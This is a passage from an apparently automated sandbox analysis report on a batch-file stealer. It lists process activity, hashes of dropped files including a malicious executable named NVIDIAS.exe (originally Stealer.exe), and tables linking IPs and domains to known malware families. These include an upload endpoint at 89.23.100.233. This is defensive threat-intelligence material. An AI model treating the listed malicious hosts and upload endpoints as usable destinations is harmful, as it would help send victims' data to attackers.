                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: 3gJQoqWpxb.bat
                                                TimeTypeDescription
                                                11:30:01API Interceptor38x Sleep call for process: powershell.exe modified
                                                11:30:25API Interceptor75x Sleep call for process: NVIDIAS.exe modified
                                                11:30:34API Interceptor2x Sleep call for process: svchost.exe modified
                                                11:30:37API Interceptor1x Sleep call for process: WerFault.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                140.82.113.4SecuriteInfo.com.FileRepMalware.16991.21545.exeGet hashmaliciousUnknownBrowse
                                                  Dekont.jarGet hashmaliciousSTRRATBrowse
                                                    MDE_File_Sample_1e6015f93d85f7b9e57857c379892348775dbb40.zipGet hashmaliciousUnknownBrowse
                                                      Invoice - PL.jarGet hashmaliciousSTRRATBrowse
                                                        OR20240905662201.jsGet hashmaliciousSTRRATBrowse
                                                          OR20240905662201.jsGet hashmaliciousSTRRATBrowse
                                                            OR20240905662201.jarGet hashmaliciousSTRRATBrowse
                                                              https://github.com/ytisf/theZoo/blob/master/malware/Binaries/Artemis/Artemis.sha256Get hashmaliciousUnknownBrowse
                                                                swift copy.jarGet hashmaliciousSTRRATBrowse
                                                                  https://pub-9af459faa3e54a63ae5d1f2be8790ad0.r2.dev/get-authenticated.htmlGet hashmaliciousUnknownBrowse
                                                                    89.23.100.2337fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
                                                                    • 89.23.100.233:1490/upload
                                                                    T05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                                    • 89.23.100.233:1488/upload
                                                                    3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                                                    • 89.23.100.233:1489/upload
                                                                    VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                                                    • 89.23.100.233:1488/upload
                                                                    104.16.184.2417fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
                                                                    • icanhazip.com/
                                                                    T05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                                    • icanhazip.com/
                                                                    VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                                                    • icanhazip.com/
                                                                    Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                    • icanhazip.com/
                                                                    gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                                                    • icanhazip.com/
                                                                    uyz4YPUyc9.exeGet hashmaliciousStealeriumBrowse
                                                                    • icanhazip.com/
                                                                    yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                                    • icanhazip.com/
                                                                    5E3zWXveDN.exeGet hashmaliciousStealeriumBrowse
                                                                    • icanhazip.com/
                                                                    LKxcbzlwkz.exeGet hashmaliciousAveMaria, KeyLogger, StealeriumBrowse
                                                                    • icanhazip.com/
                                                                    9fGsCDYKLV.exeGet hashmaliciousFlesh StealerBrowse
                                                                    • icanhazip.com/
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    raw.githubusercontent.comuZgbejeJkT.batGet hashmaliciousUnknownBrowse
                                                                    • 185.199.108.133
                                                                    ni2OwV1y9u.batGet hashmaliciousUnknownBrowse
                                                                    • 185.199.108.133
                                                                    GdGXG0bnxH.exeGet hashmaliciousUnknownBrowse
                                                                    • 185.199.109.133
                                                                    LaRHzSijsq.exeGet hashmaliciousDCRatBrowse
                                                                    • 185.199.109.133
                                                                    3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                    • 185.199.109.133
                                                                    c56uoWlDXp.exeGet hashmaliciousUnknownBrowse
                                                                    • 185.199.111.133
                                                                    gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                    • 185.199.110.133
                                                                    svhost.vbsGet hashmaliciousUnknownBrowse
                                                                    • 185.199.111.133
                                                                    hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                    • 185.199.111.133
                                                                    icanhazip.comCVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                    • 104.16.185.241
                                                                    file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
                                                                    • 104.16.185.241
                                                                    file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                    • 104.16.185.241
                                                                    7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.16.184.241
                                                                    iGxCM2I5u9.exeGet hashmaliciousFlesh StealerBrowse
                                                                    • 104.16.185.241
                                                                    T05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.16.184.241
                                                                    3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.16.185.241
                                                                    VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.16.184.241
                                                                    Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                    • 104.16.184.241
                                                                    gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                                                    • 104.16.184.241
                                                                    github.comuZgbejeJkT.batGet hashmaliciousUnknownBrowse
                                                                    • 20.233.83.145
                                                                    ni2OwV1y9u.batGet hashmaliciousUnknownBrowse
                                                                    • 20.233.83.145
                                                                    c56uoWlDXp.exeGet hashmaliciousUnknownBrowse
                                                                    • 20.233.83.145
                                                                    zpbiw0htk6.lnkGet hashmaliciousUnknownBrowse
                                                                    • 185.199.110.133
                                                                    in.exeGet hashmaliciousBabadeda, HTMLPhisherBrowse
                                                                    • 20.233.83.145
                                                                    https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                    • 20.233.83.145
                                                                    PixelFlasher.exeGet hashmaliciousUnknownBrowse
                                                                    • 20.233.83.145
                                                                    https://github.com/greenshot/greenshot/releases/download/Greenshot-RELEASE-1.2.10.6/Greenshot-INSTALLER-1.2.10.6-RELEASE.exeGet hashmaliciousUnknownBrowse
                                                                    • 20.233.83.145
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    GITHUBUShttps://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                    • 140.82.113.22
                                                                    PO24002292.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                    • 140.82.121.4
                                                                    CORREIO BCV.zip.htmlGet hashmaliciousUnknownBrowse
                                                                    • 140.82.112.22
                                                                    https://github.com/karakun/OpenWebStart/releases/download/v1.10.1/OpenWebStart_windows-x64_1_10_1.exeGet hashmaliciousUnknownBrowse
                                                                    • 140.82.121.4
                                                                    kIMPADTn5g.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                    • 140.82.121.4
                                                                    https://github.com/Ultimaker/Cura/releases/download/5.9.0/UltiMaker-Cura-5.9.0-win64-X64.exeGet hashmaliciousUnknownBrowse
                                                                    • 140.82.121.4
                                                                    https://github.com/bambulab/BambuStudio/releases/download/v01.10.01.50/Bambu_Studio_win_public-v01.10.01.50-20241115162711.exeGet hashmaliciousUnknownBrowse
                                                                    • 140.82.121.3
                                                                    SWIFT-MT103-17112024.jsGet hashmaliciousSTRRATBrowse
                                                                    • 140.82.121.4
                                                                    SWIFT-MT103-17112024.jsGet hashmaliciousSTRRATBrowse
                                                                    • 140.82.121.4
                                                                    Nota1893.exeGet hashmaliciousUnknownBrowse
                                                                    • 140.82.121.4
                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                    • 172.67.164.37
                                                                    wf1Ps82LYF.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.50.161
                                                                    https://share.hsforms.com/1Izw71u6TTr2VFC-t9f1KFgsvgdjGet hashmaliciousUnknownBrowse
                                                                    • 104.18.142.119
                                                                    https://qrs.ly/gggdyxxGet hashmaliciousUnknownBrowse
                                                                    • 1.1.1.1
                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                    • 104.26.14.131
                                                                    https://tinyurl.com/ajdoea10dk66Get hashmaliciousUnknownBrowse
                                                                    • 104.21.96.1
                                                                    IMAKBWPY.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.219.27
                                                                    JIKJCBEX.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.80.1
                                                                    YTRNYRXC.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.96.1
                                                                    pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    MAXITEL-ASRUfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                    • 89.23.100.42
                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                    • 89.23.100.42
                                                                    7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
                                                                    • 89.23.100.233
                                                                    iGxCM2I5u9.exeGet hashmaliciousFlesh StealerBrowse
                                                                    • 89.23.100.233
                                                                    T05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                                    • 89.23.100.233
                                                                    3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                                                    • 89.23.100.233
                                                                    VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                                                    • 89.23.100.233
                                                                    Installer_setup32_64x.exeGet hashmaliciousLummaC, StealcBrowse
                                                                    • 89.23.96.109
                                                                    9fGsCDYKLV.exeGet hashmaliciousFlesh StealerBrowse
                                                                    • 89.23.100.233
                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                    • 89.23.100.233
                                                                    FASTLYUSuZgbejeJkT.batGet hashmaliciousUnknownBrowse
                                                                    • 185.199.108.133
                                                                    ni2OwV1y9u.batGet hashmaliciousUnknownBrowse
                                                                    • 185.199.108.133
                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                    • 151.101.194.159
                                                                    GdGXG0bnxH.exeGet hashmaliciousUnknownBrowse
                                                                    • 185.199.109.133
                                                                    https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSL813n1NSUgoHlh-2FH8jVXE55TTo10JYMDP3MpP9biJ-2BivxRElKJfGcSf3Wm0bk6-2BuL6x9TaALAI-2BL1qw1Dee2Qg-3DwH82_lUpiXeYCZ5wahax4fkypnG65rENS0eHcuXkODr9BV8nkC0Nc6-2BAihSf0cmYNntTLO4SyowozBXe6Qe-2Bbp-2FFF3a1FIQOXuBqEKUpfXMQ5PPxSuhMxN-2FGKw6aVp7-2FrJaFsaK3MxWcXiB-2FQGWayulE8-2FtCvMhmv4KaADpZ-2B0qQmLVPxqh24uJt9FaNBQBIm1l70gJHtveQ3b-2FplaZ4NS9-2FFv9-2FcAZ4BnOdGLbd-2BNZzE9Ba47yxwqIyGzlJ-2BmDN57eM41CachqUTFf5upDlE1JEwIy6eZ7t9nvf-2Fc9lQV8qupSe0IpWj5cFkfBjNJ9myaj1i3KCzGOXUSk-2F4E-2FHX-2BkuwdmqzU7u2OKMrHZeEXOJLiSw-3D#CGet hashmaliciousUnknownBrowse
                                                                    • 151.101.2.137
                                                                    https://simatantincendi.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.2.137
                                                                    https://business.livechathelpsuite.comGet hashmaliciousUnknownBrowse
                                                                    • 151.101.66.137
                                                                    fNlxQP0jBz.exeGet hashmaliciousCredential FlusherBrowse
                                                                    • 151.101.129.91
                                                                    LbgqLv7gT7.exeGet hashmaliciousCredential FlusherBrowse
                                                                    • 151.101.65.91
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    3b5074b1b5d032e5620f69f9f700ff0euZgbejeJkT.batGet hashmaliciousUnknownBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.113.4
                                                                    ni2OwV1y9u.batGet hashmaliciousUnknownBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.113.4
                                                                    l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.113.4
                                                                    l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.113.4
                                                                    pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.113.4
                                                                    KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.113.4
                                                                    cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.113.4
                                                                    https://147.45.47.98/error.jsGet hashmaliciousUnknownBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.113.4
                                                                    ak3o7AZ3mH.exeGet hashmaliciousBabadeda, Conti, MimikatzBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.113.4
                                                                    No context
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.13581950617431202
                                                                    Encrypted:false
                                                                    SSDEEP:384:mJHL7HbahIfcjcidIiBysHciXBs78MmhRht43mKdyrf6YM5J:mJP74rzc8Myr43mNrf6YM5J
                                                                    MD5:D94132E6614A2166724BEE3447AFAA45
                                                                    SHA1:19EC19D17314C234189DFB0EA83F250AD6C470F9
                                                                    SHA-256:949BDB93843A80AF998017B6D28BE4586AC3AB267F9E04789CBCEB1ED782023B
                                                                    SHA-512:6608388BD58607B6FBE070BEBB3DB05F31B2366D42F61284EE13D2FC597955DFF4B345F94A18A6BF58F5C072FB172F3CB5F793E1BE8842FE44342FC6C1C9C723
                                                                    Malicious:false
                                                                    Preview:...........@..@.3...{g..*...yo.........<.....).*9...y..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................;..........v[.2}c}c.#.........`h.d...............h.<.....6.:......p..*9...y..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc5fd34de, page size 16384, DirtyShutdown, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):1048576
                                                                    Entropy (8bit):0.8698155118652139
                                                                    Encrypted:false
                                                                    SSDEEP:1536:LSB2qSB2gSjlK/LfDalKohVF8/bGLBSBLil2d/3Cr5DHzk/3A5v7GoCnLKxKHKrx:LapaQK0yfOD8F31Xw
                                                                    MD5:13FF756982B241EE8C6D5C0F562CEC00
                                                                    SHA1:99AD8006B5DBBEA24FE2DB81B722AD76E323488B
                                                                    SHA-256:108C5A0E80FAE2046B86A731513F5BAD531A01EEB27C11057C3F4EF8C339C084
                                                                    SHA-512:8C4580DACF0174B4BE8E1FC31F156A8B0F76C6579F2E8FD482697365F38AF6A53B533361F9B0A35668D17D7AE8F77F02FB8A00955BB12372F4A5C61DA8BCA4D0
                                                                    Malicious:false
                                                                    Preview:..4.... ................p..*9...y........................0..........|)."....|..h.2...........................).*9...y..........................................................................................................bJ......n....@...................................................................................................... ........3...{g.....................................................................................................................................................................................................................................#.fh"....|.....................2"....|...........................#......h.2.....................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):16384
                                                                    Entropy (8bit):0.08264335445940388
                                                                    Encrypted:false
                                                                    SSDEEP:3:7ltu9113e2lqBj4i4uRFE5/ll/k4tollo0lJlbxvws:hg11uHj3LRi5/llSL
                                                                    MD5:59D57D3C0AC216E8FB1BE18AD93087D7
                                                                    SHA1:CF63FEFA54F76CD78B52A8490B66F589A095093A
                                                                    SHA-256:E6BB063689B45936637865FC6BF288896CFFC1713D73CF07E52B5AB0AB156AF0
                                                                    SHA-512:E10DAC54B50A6E665955FF3A394E93BA1B51280BA4AAE3100613C378867AD763986A8965D7FA803465096FDDCFD8792A647A199CD18EBEC809CECE040F10BAA9
                                                                    Malicious:false
                                                                    Preview:.+......................................*9...y.."....|.......|)..............|)......|)..C.t.....|)O...................2"....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):1.436788635169506
                                                                    Encrypted:false
                                                                    SSDEEP:192:RGSVqGtSrtmWbk9amo75E6UVWfaD2BHdDu76nfAIO8e:MSVqGEcWbk9ad5Ewa69Du76nfAIO8e
                                                                    MD5:6F19AF2AC8C95B2307EE29FD4560D0E6
                                                                    SHA1:FDBEAE8C3A4EC3BFE447D8452BFA82702B0D9241
                                                                    SHA-256:1353F430C0BEA944651F665DAF865EBAA39EDE61FCEFF64B1BF3807645452A6D
                                                                    SHA-512:4DA59CCA7BDDEED64F284341D8CA480FE8ADD7AC02C228A03C095BBD3AB7D61A5888F68EE8574361F716F5450C539D0F25AF3E2BAA61CA2FC00D254EB4A036E3
                                                                    Malicious:false
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.3.5.1.1.6.3.2.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.8.4.0.2.3.5.5.5.3.7.2.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.c.2.4.8.5.9.-.3.2.b.a.-.4.d.9.1.-.9.0.8.e.-.7.d.1.8.a.5.d.7.4.5.7.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.7.2.3.0.7.4.-.f.c.8.5.-.4.4.2.1.-.8.a.e.9.-.d.0.3.b.c.f.2.4.8.b.6.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.V.I.D.I.A.S...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.t.e.a.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.c.c.-.0.0.0.1.-.0.0.5.0.-.6.4.6.a.-.9.e.c.a.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.9.e.4.0.2.a.8.f.5.c.6.8.0.c.d.8.4.3.1.0.e.a.9.f.b.a.2.e.c.7.0.0.0.0.0.0.0.0.!.0.0.0.0.5.4.8.9.5.4.a.0.2.8.4.e.d.9.d.d.8.8.7.f.b.1.d.3.9.6.7.1.2.8.9.9.7.0.a.a.5.3.4.0.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Mon Dec 16 16:30:35 2024, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):257581
                                                                    Entropy (8bit):4.4136750514837555
                                                                    Encrypted:false
                                                                    SSDEEP:1536:SZUA7sm8agh310BojR0spN4uE2aOpVn6rSVXvAc0NMYXLTgdUx1QUBTW++qFZtTc:uUqsm8aUP064uEqpyyhALTgCMqZ7Mic
                                                                    MD5:0E72D32A744C0749533575987E540F9B
                                                                    SHA1:F2F8CDEDB7C87B2D87E2FF35B8E9077457B801CB
                                                                    SHA-256:3808E3F74E99794622EC2890BCFCB8357AFF956A3BCD05DEEF9F2D24F0040F60
                                                                    SHA-512:B7A5857D0B700FB52D2873959A1570799A8523D0CA39C5DBEE026510977E4ECD3F5B34A8C7F64E2BCD0CB2813505448B8B31177684FFD9436E611C34607DE754
                                                                    Malicious:false
                                                                    Preview:MDMP..a..... ........U`g............4............+..H.......<...,3......d%..$F..........`.......8...........T............w...v..........h3..........T5..............................................................................bJ.......5......GenuineIntel...........T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8282
                                                                    Entropy (8bit):3.6745662548864244
                                                                    Encrypted:false
                                                                    SSDEEP:192:R9l7lZNivG64OFk6YK42ScgmfZBPkpD089bY0sfYIm:R9lnNi+6o6YKpScgmffAYnf+
                                                                    MD5:4613A48D63903F557770FE7786F920AC
                                                                    SHA1:55733AB9170F633B9C31BE70247AB3914E10E8F5
                                                                    SHA-256:A99F25477AE486964A208039FCCDB1172FCA7395873BCFCC80C12CF80D430DFE
                                                                    SHA-512:7A1115F8ED67EB44025A607F3586B7D5607DC884A40D5C88D0B85BCDF39774E2803F676B230A9571BB6F2C948D7D7F1DFF2FF673834EBAC415AE4916C09F1916
                                                                    Malicious:false
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.6.<./.P.i.d.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4850
                                                                    Entropy (8bit):4.476267489399379
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwwtl8zsF4e702I7VFJ5WS2Cfjksms3rm8M4JEprPFD+q8vOprlchLBIf5d:uILfFt7GySPf75JsKmchLBIRd
                                                                    MD5:323C7140495383BE6787D42977AC2A6C
                                                                    SHA1:E299090B708A7ABA3F5B7BE014F47BBA13CCC264
                                                                    SHA-256:323D5A01E2DB3A8E893E2FF42CAF93151A9E9D868DBD9B255E654B9F23B29693
                                                                    SHA-512:F587C69C61F4D3FE0FBD76FF1BDEAF76F0CA8143887BDF241920F1E2299EC292555212C292ED618A6D1FB89F839C3E163C66ABF59DDE73E1B600549B85E1B1C2
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222977862" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):827904
                                                                    Entropy (8bit):7.713074023738123
                                                                    Encrypted:false
                                                                    SSDEEP:12288:VZkAFJWTLQNWdHSMMsar67G2AB6xUPXVyhXXv3eeDJ+qgTvuYpiebJB7FEnjd1ib:UAFlNWdH2qYLMPue1S2YhbTFggJfvJ
                                                                    MD5:2FE8C93D75210E538AEC9062BA29C645
                                                                    SHA1:548954A0284ED9DD887FB1D39671289970AA5340
                                                                    SHA-256:53C6EF3ED4D5B1758DA8ED974AF09901A9EF9D9C7E77E2AF7B5194CD8214B4F9
                                                                    SHA-512:089D69AC48AF9E77209DB87C28719B6567FA8F43375E4F6A6BC9F30BF3A7A3A86E249F1EAB2CB231D5F7B613DB63F6B442AA5F913CA7DF1DBA34B62E17F3F8FB
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}..........."...0..............~... ........@.. ....................................`.................................l...(....................................................................................................)..H............text........ ...................... ..`.4Ul....s........................... ..`.+,2................................@....>h"....4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.34726597513537405
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlll:Nll
                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                    Malicious:false
                                                                    Preview:@...e...........................................................
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
